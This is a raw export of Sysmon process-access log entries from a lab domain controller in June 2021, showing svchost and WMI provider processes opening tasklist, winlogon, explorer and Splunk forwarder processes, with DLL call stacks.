21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F2B-60D3-C600-00000000CF01}4680C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F2B-60D3-C300-00000000CF01}4216C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025896Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9E64-60D3-9700-00000000CF01}4220C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025895Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9E1E-60D3-8E00-00000000CF01}4940C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9E1D-60D3-8C00-00000000CF01}4752C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9E06-60D3-7E00-00000000CF01}2588C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9E06-60D3-7D00-00000000CF01}2556C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DFF-60D3-7600-00000000CF01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025889Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025888Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 